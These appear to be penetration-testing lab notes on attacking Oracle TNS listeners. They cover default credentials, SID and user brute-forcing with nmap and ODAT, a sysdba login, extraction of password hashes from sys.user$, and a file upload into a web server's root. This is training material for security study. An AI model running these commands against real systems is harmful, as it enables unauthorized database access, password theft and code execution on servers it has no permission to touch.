Oracle TNS

The TNS listener is configured to support various network protocols, including TCP/IP, UDP, IPX/SPX, and AppleTalk

The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the $ORACLE_HOME/network/admin directory

Oracle 9 has a default password, CHANGE_ON_INSTALL, whereas Oracle 10 has no default password set

Oracle DBSNMP service also uses a default password, dbsnmp

Each database or service has a unique entry in the file

In Oracle RDBMS, a System Identifier (SID) is a unique name that identifies a particular database instance

The SIDs are an essential part of the connection process, as it identifies the specific instance of the database the client wants to connect to.

There are various ways to enumerate, or better said, guess SIDs. Therefore we can use tools like nmap, hydra, odat, and others.

Tools

./odat.py -h

If not installed, see Pentesting Machine

Nmap - SID Bruteforcing

sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute

ODAT - More information, user bruteforcing included

./odat.py all -s 10.129.204.235

SQLplus - Log In

sqlplus <username>/<password>@<IP>/<SID>

select table_name from all_tables;

select * from user_role_privs;

Database Enumeration

possible to try known credentials to use the System Databse Admin sysdba:

sqlplus scott/tiger@10.129.204.235/XE as sysdba

Then list current user privs:

select * from user_role_privs;

From this point, we could retrieve the password hashes from the sys.user$ and try to crack them offline:

select name, password from sys.user$;

Oracle RDBMS - File Upload

echo "Oracle File Upload Test" > testing.txt
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

curl -X GET http://10.129.204.235/testing.txt